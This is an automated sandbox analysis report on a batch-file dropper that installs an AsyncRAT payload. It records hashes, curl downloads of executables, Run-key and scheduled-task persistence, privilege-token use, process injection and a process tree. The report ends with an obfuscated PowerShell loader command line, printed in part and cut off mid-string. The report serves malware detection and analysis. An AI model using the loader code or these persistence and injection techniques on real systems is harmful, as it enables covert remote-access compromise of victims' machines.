Analysis
-
max time kernel
25s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
17-06-2024 21:31
Static task
static1
Behavioral task
behavioral1
Sample
dropper_1.bat
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
dropper_1.bat
Resource
win10v2004-20240226-en
General
-
Target
dropper_1.bat
-
Size
4KB
-
MD5
79ed3c44fbaa266a61ab8764d2c3b520
-
SHA1
277d14837b49e11dee8fbfbe3542b895553d20e2
-
SHA256
23873dba0e67fba174146cc0dfe7c73faf44315447ccb7ce39e3e4eb7a7bc812
-
SHA512
feeb1263aa99115ab4b96752ec97bc30c1e73f8c0adc206dee918f656c34d81ee61d391357895453c1266476cb91223e125e5b4b01aabf28580e00120ab32ea4
-
SSDEEP
48:61jKP/WlIqQ9+iCObFg/7gGcK+hrZahJUrSXYSlDI6p8536anO6jiF6ydr6o3Sqk:ZP/HVbxaLUrCcKoig
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 4876 created 616 4876 powershell.EXE winlogon.exe -
Async RAT payload 1 IoCs
Processes:
resource yara_rule C:\Windows\Resources\$77-scchost.exe family_asyncrat -
Downloads MZ/PE file
-
Sets service image path in registry 2 TTPs 1 IoCs
Processes:
WaaSMedicAgent.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" WaaSMedicAgent.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
$77-scchost.exe$77-penisware.exe$77-sdchost.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation $77-scchost.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation $77-penisware.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation $77-sdchost.exe -
Executes dropped EXE 7 IoCs
Processes:
$77-sdchost.exe$77-scchost.exe$77-penisware.exe$77-penisware2.exe$77-install.exe$77-penisware2.exe$77-sachost.exepid process 3664 $77-sdchost.exe 1572 $77-scchost.exe 4620 $77-penisware.exe 1624 $77-penisware2.exe 3996 $77-install.exe 4664 $77-penisware2.exe 2260 $77-sachost.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
$77-sdchost.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77-scchost = "C:\\Users\\Admin\\AppData\\Roaming\\$77-scchost.exe" $77-sdchost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Drops file in System32 directory 4 IoCs
Processes:
svchost.exepowershell.EXE$77-penisware2.exedescription ioc process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\MyData\DataLogs.conf $77-penisware2.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 4876 set thread context of 4560 4876 powershell.EXE dllhost.exe -
Drops file in Windows directory 5 IoCs
Processes:
curl.execurl.execurl.execurl.execurl.exedescription ioc process File created C:\Windows\Resources\$77-sdchost.exe curl.exe File created C:\Windows\Resources\$77-scchost.exe curl.exe File created C:\Windows\Resources\$77-penisware.exe curl.exe File created C:\Windows\Resources\$77-penisware2.exe curl.exe File created C:\Windows\Resources\$77-install.exe curl.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 13 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exemousocoreworker.exesvchost.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 2664 schtasks.exe 3424 schtasks.exe 372 schtasks.exe -
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 4432 timeout.exe 2252 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
wmiprvse.exemousocoreworker.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe -
Modifies data under HKEY_USERS 55 IoCs
Processes:
powershell.EXEdllhost.exesvchost.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" dllhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ dllhost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02lzqkrjhloklxgj\Provision Monday, June 17, 2024 21:32:12 = "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAaO8Q6AKaiEeDrQoeRrzyhQAAAAACAAAAAAAQZgAAAAEAACAAAAA8WDSkwKy9Lf9V0DuxJZ6nU0p6SvhxInIcM1hBu92coQAAAAAOgAAAAAIAACAAAAAgMp8Chkk6W4gnKZB4/129bjj5EFYLIqMdS3WsSfhYcyAAAACNEMdPOzcXtGx56YawF4zZHfEWz80M7u2cB5MHhA6qL0AAAADiXB5QNj9gVEoI4mBriO1n2JEmCb/IQDSadUGy4b7BxWlxRKOBB8kXzwKqa6MsYlzq+9mrAQDjvy4crBYVnkvw" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02xcukljkubeqild\Provision Monday, June 17, 2024 21:32:12 = "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAaO8Q6AKaiEeDrQoeRrzyhQAAAAACAAAAAAAQZgAAAAEAACAAAADxYftXFsGfnAJjL+zuoOAzaqx5ytFEclV1KEb01sn0ZgAAAAAOgAAAAAIAACAAAAAKGsY2Mm4iNjMQ5Vkzy31ieOWbGTL92BsBS2Bh5A36zCAAAACtKFNe8EadlhsD9XPff09BvstwNBFm4QZ5WjVUJvnKeEAAAAAHzY4pJBriJGBKQgpfQ59ZE5JtnN/YTVbtl78Lrp+vDcYGkg7V0wSGAS1hfLzP39ycrc7ANdS89jZKzfEIL5v8" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02pmcrkqfhzepqip svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02xcukljkubeqild svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" dllhost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02nydgkaqyxlqaog\Provision Monday, June 17, 2024 21:32:13 = "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAaO8Q6AKaiEeDrQoeRrzyhQAAAAACAAAAAAAQZgAAAAEAACAAAACMc62JJsO7RhBuGrguHTjiH675R9DSEEXANA4h5boo6QAAAAAOgAAAAAIAACAAAABI8qpVpI0LoRZDgTNUBqaYJXbRGsgFSVXgs+THsh3npyAAAABNTvBFCHwTbZd/SKKbJChwr+fnGESwLdwCGFy2O6tYsEAAAACGTLsnYC1m2S/ZOj5hfMeTswS3W5K6QXwfjSGMXO7MjxADJvlFHqJYGWdxBKAiQK8Rz8/ELcuiCwUpAzSlMU1I" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" dllhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02lzqkrjhloklxgj svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" dllhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02pmcrkqfhzepqip\Provision Monday, June 17, 2024 21:32:13 = "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAaO8Q6AKaiEeDrQoeRrzyhQAAAAACAAAAAAAQZgAAAAEAACAAAADvmcAs3qtdXE75Hyqd+vnEX9mpwX7sy1HdXwRYLWhKNgAAAAAOgAAAAAIAACAAAACZel0pcmLxvGdglskw2KE7VD2kRYJh8Qr8Icso4riYoCAAAADNy/E2F5Wj+Gpus9yAOTZtAyj51g5c9xee8ZWrCDdX/EAAAADdct1cdmw+9I6FEzy4rDE3bdlYUmF6wd5UiOyNVf+lSAddwbiI33PMbdHdx4H91/r4SVtaHMYjQJKLYpUPAXC0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02nydgkaqyxlqaog svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
$77-penisware2.exe$77-scchost.exepowershell.EXEdllhost.exe$77-penisware2.exepid process 1624 $77-penisware2.exe 1624 $77-penisware2.exe 1624 $77-penisware2.exe 1572 $77-scchost.exe 1572 $77-scchost.exe 1572 $77-scchost.exe 1572 $77-scchost.exe 1572 $77-scchost.exe 1572 $77-scchost.exe 1572 $77-scchost.exe 1572 $77-scchost.exe 1572 $77-scchost.exe 1572 $77-scchost.exe 1572 $77-scchost.exe 1572 $77-scchost.exe 1572 $77-scchost.exe 1572 $77-scchost.exe 4876 powershell.EXE 4876 powershell.EXE 1572 $77-scchost.exe 1572 $77-scchost.exe 1572 $77-scchost.exe 1572 $77-scchost.exe 1572 $77-scchost.exe 1572 $77-scchost.exe 1572 $77-scchost.exe 1572 $77-scchost.exe 1572 $77-scchost.exe 1572 $77-scchost.exe 4876 powershell.EXE 4876 powershell.EXE 4560 dllhost.exe 4560 dllhost.exe 4560 dllhost.exe 4560 dllhost.exe 4560 dllhost.exe 4560 dllhost.exe 4560 dllhost.exe 4560 dllhost.exe 4560 dllhost.exe 4560 dllhost.exe 4560 dllhost.exe 4560 dllhost.exe 4560 dllhost.exe 4560 dllhost.exe 4560 dllhost.exe 4560 dllhost.exe 4560 dllhost.exe 4560 dllhost.exe 4560 dllhost.exe 4560 dllhost.exe 4664 $77-penisware2.exe 4664 $77-penisware2.exe 4560 dllhost.exe 4560 dllhost.exe 4664 $77-penisware2.exe 4560 dllhost.exe 4560 dllhost.exe 1624 $77-penisware2.exe 1624 $77-penisware2.exe 4560 dllhost.exe 4560 dllhost.exe 4560 dllhost.exe 4560 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
$77-penisware2.exe$77-penisware.exe$77-sdchost.exe$77-scchost.exepowershell.EXEdllhost.exe$77-penisware2.exesvchost.exewmiprvse.exesvchost.exedescription pid process Token: SeDebugPrivilege 1624 $77-penisware2.exe Token: SeDebugPrivilege 4620 $77-penisware.exe Token: SeDebugPrivilege 3664 $77-sdchost.exe Token: SeDebugPrivilege 1572 $77-scchost.exe Token: SeDebugPrivilege 3664 $77-sdchost.exe Token: SeDebugPrivilege 4620 $77-penisware.exe Token: SeDebugPrivilege 1572 $77-scchost.exe Token: SeDebugPrivilege 4876 powershell.EXE Token: SeDebugPrivilege 4876 powershell.EXE Token: SeDebugPrivilege 4560 dllhost.exe Token: SeDebugPrivilege 4664 $77-penisware2.exe Token: SeAssignPrimaryTokenPrivilege 2600 svchost.exe Token: SeIncreaseQuotaPrivilege 2600 svchost.exe Token: SeSecurityPrivilege 2600 svchost.exe Token: SeTakeOwnershipPrivilege 2600 svchost.exe Token: SeLoadDriverPrivilege 2600 svchost.exe Token: SeSystemtimePrivilege 2600 svchost.exe Token: SeBackupPrivilege 2600 svchost.exe Token: SeRestorePrivilege 2600 svchost.exe Token: SeShutdownPrivilege 2600 svchost.exe Token: SeSystemEnvironmentPrivilege 2600 svchost.exe Token: SeUndockPrivilege 2600 svchost.exe Token: SeManageVolumePrivilege 2600 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2600 svchost.exe Token: SeIncreaseQuotaPrivilege 2600 svchost.exe Token: SeSecurityPrivilege 2600 svchost.exe Token: SeTakeOwnershipPrivilege 2600 svchost.exe Token: SeLoadDriverPrivilege 2600 svchost.exe Token: SeSystemtimePrivilege 2600 svchost.exe Token: SeBackupPrivilege 2600 svchost.exe Token: SeRestorePrivilege 2600 svchost.exe Token: SeShutdownPrivilege 2600 svchost.exe Token: SeSystemEnvironmentPrivilege 2600 svchost.exe Token: SeUndockPrivilege 2600 svchost.exe Token: SeManageVolumePrivilege 2600 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2600 svchost.exe Token: SeIncreaseQuotaPrivilege 2600 svchost.exe Token: SeSecurityPrivilege 2600 svchost.exe Token: SeTakeOwnershipPrivilege 2600 svchost.exe Token: SeLoadDriverPrivilege 2600 svchost.exe Token: SeSystemtimePrivilege 2600 svchost.exe Token: SeBackupPrivilege 2600 svchost.exe Token: SeRestorePrivilege 2600 svchost.exe Token: SeShutdownPrivilege 2600 svchost.exe Token: SeSystemEnvironmentPrivilege 2600 svchost.exe Token: SeUndockPrivilege 2600 svchost.exe Token: SeManageVolumePrivilege 2600 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2600 svchost.exe Token: SeIncreaseQuotaPrivilege 2600 svchost.exe Token: SeSecurityPrivilege 2600 svchost.exe Token: SeTakeOwnershipPrivilege 2600 svchost.exe Token: SeLoadDriverPrivilege 2600 svchost.exe Token: SeSystemtimePrivilege 2600 svchost.exe Token: SeBackupPrivilege 2600 svchost.exe Token: SeRestorePrivilege 2600 svchost.exe Token: SeShutdownPrivilege 2600 svchost.exe Token: SeSystemEnvironmentPrivilege 2600 svchost.exe Token: SeUndockPrivilege 2600 svchost.exe Token: SeManageVolumePrivilege 2600 svchost.exe Token: SeDebugPrivilege 4744 wmiprvse.exe Token: SeAuditPrivilege 2536 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2600 svchost.exe Token: SeIncreaseQuotaPrivilege 2600 svchost.exe Token: SeSecurityPrivilege 2600 svchost.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
$77-penisware2.exe$77-penisware2.exepid process 1624 $77-penisware2.exe 4664 $77-penisware2.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exedescription pid process target process PID 2432 wrote to memory of 3832 2432 cmd.exe chcp.com PID 2432 wrote to memory of 3832 2432 cmd.exe chcp.com PID 2432 wrote to memory of 668 2432 cmd.exe curl.exe PID 2432 wrote to memory of 668 2432 cmd.exe curl.exe PID 2432 wrote to memory of 4520 2432 cmd.exe curl.exe PID 2432 wrote to memory of 4520 2432 cmd.exe curl.exe PID 2432 wrote to memory of 2440 2432 cmd.exe curl.exe PID 2432 wrote to memory of 2440 2432 cmd.exe curl.exe PID 2432 wrote to memory of 3000 2432 cmd.exe curl.exe PID 2432 wrote to memory of 3000 2432 cmd.exe curl.exe PID 2432 wrote to memory of 4724 2432 cmd.exe curl.exe PID 2432 wrote to memory of 4724 2432 cmd.exe curl.exe PID 2432 wrote to memory of 3660 2432 cmd.exe curl.exe PID 2432 wrote to memory of 3660 2432 cmd.exe curl.exe PID 2432 wrote to memory of 2160 2432 cmd.exe cmd.exe PID 2432 wrote to memory of 2160 2432 cmd.exe cmd.exe PID 2432 wrote to memory of 1988 2432 cmd.exe reg.exe PID 2432 wrote to memory of 1988 2432 cmd.exe reg.exe PID 2432 wrote to memory of 2860 2432 cmd.exe cmd.exe PID 2432 wrote to memory of 2860 2432 cmd.exe cmd.exe PID 2432 wrote to memory of 2708 2432 cmd.exe reg.exe PID 2432 wrote to memory of 2708 2432 cmd.exe reg.exe PID 2432 wrote to memory of 3772 2432 cmd.exe cmd.exe PID 2432 wrote to memory of 3772 2432 cmd.exe cmd.exe PID 2432 wrote to memory of 5016 2432 cmd.exe reg.exe PID 2432 wrote to memory of 5016 2432 cmd.exe reg.exe PID 2432 wrote to memory of 2928 2432 cmd.exe cmd.exe PID 2432 wrote to memory of 2928 2432 cmd.exe cmd.exe PID 2432 wrote to memory of 2632 2432 cmd.exe reg.exe PID 2432 wrote to memory of 2632 2432 cmd.exe reg.exe PID 2432 wrote to memory of 3300 2432 cmd.exe cmd.exe PID 2432 wrote to memory of 3300 2432 cmd.exe cmd.exe PID 2432 wrote to memory of 3492 2432 cmd.exe reg.exe PID 2432 wrote to memory of 3492 2432 cmd.exe reg.exe PID 2432 wrote to memory of 2400 2432 cmd.exe cmd.exe PID 2432 wrote to memory of 2400 2432 cmd.exe cmd.exe PID 2432 wrote to memory of 908 2432 cmd.exe reg.exe PID 2432 wrote to memory of 908 2432 cmd.exe reg.exe PID 2432 wrote to memory of 2380 2432 cmd.exe cmd.exe PID 2432 wrote to memory of 2380 2432 cmd.exe cmd.exe PID 2432 wrote to memory of 2176 2432 cmd.exe reg.exe PID 2432 wrote to memory of 2176 2432 cmd.exe reg.exe PID 2432 wrote to memory of 1044 2432 cmd.exe cmd.exe PID 2432 wrote to memory of 1044 2432 cmd.exe cmd.exe PID 2432 wrote to memory of 4032 2432 cmd.exe reg.exe PID 2432 wrote to memory of 4032 2432 cmd.exe reg.exe PID 2432 wrote to memory of 2336 2432 cmd.exe cmd.exe PID 2432 wrote to memory of 2336 2432 cmd.exe cmd.exe PID 2432 wrote to memory of 4044 2432 cmd.exe reg.exe PID 2432 wrote to memory of 4044 2432 cmd.exe reg.exe PID 2432 wrote to memory of 1996 2432 cmd.exe cmd.exe PID 2432 wrote to memory of 1996 2432 cmd.exe cmd.exe PID 2432 wrote to memory of 4272 2432 cmd.exe reg.exe PID 2432 wrote to memory of 4272 2432 cmd.exe reg.exe PID 2432 wrote to memory of 1752 2432 cmd.exe cmd.exe PID 2432 wrote to memory of 1752 2432 cmd.exe cmd.exe PID 2432 wrote to memory of 1416 2432 cmd.exe reg.exe PID 2432 wrote to memory of 1416 2432 cmd.exe reg.exe PID 2432 wrote to memory of 4444 2432 cmd.exe cmd.exe PID 2432 wrote to memory of 4444 2432 cmd.exe cmd.exe PID 2432 wrote to memory of 3200 2432 cmd.exe reg.exe PID 2432 wrote to memory of 3200 2432 cmd.exe reg.exe PID 2432 wrote to memory of 2628 2432 cmd.exe cmd.exe PID 2432 wrote to memory of 2628 2432 cmd.exe cmd.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{e1ba08b3-a4d3-4c32-955a-134170485390}2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Resources\$77-penisware2.exe"C:\Windows\Resources\$77-penisware2.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:nOgvgZQkzbuj{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$vnzInwxdNVlxkR,[Parameter(Position=1)][Type]$TIDcXxbMPT)$NXjPmyfoVuP=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+[Char](102)+''+'l'+'e'+[Char](99)+''+[Char](116)+''+'e'+''+[Char](100)+''+[Char](68)+''+'e'+''+[Char](108)+''+'e'+'g'+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'M'+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+'p'+[Char](101)+'',''+'C'+'l'+'a'+''+[Char](115)+''+[Char](115)+''+','+''+'P'+'u'+'b'+''+'l'+''+'i'+''+[Char](99)+''+[Char](44)+'Se'+'a'+'l'+'e'+'d'+[Char](44)+''+[Char](65)+''+[Char](110)+'siC'+[Char](108)+''+'a'+''+'s'+''+[Char](115)+''+','+'A'+[Char](117)+''+'t'+'oC'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$NXjPmyfoVuP.DefineConstructor('R'+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+''+[Char](99)+'i'+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+'e'+''+','+''+[Char](72)+''+'i'+''+[Char](100)+'e'+[Char](66)+'yS'+[Char](105)+''+[Char](103)+','+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$vnzInwxdNVlxkR).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+'a'+[Char](110)+''+[Char](97)+''+'g'+'e'+'d'+'');$NXjPmyfoVuP.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+[Char](111)+'k'+'e'+'','P'+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c,'+[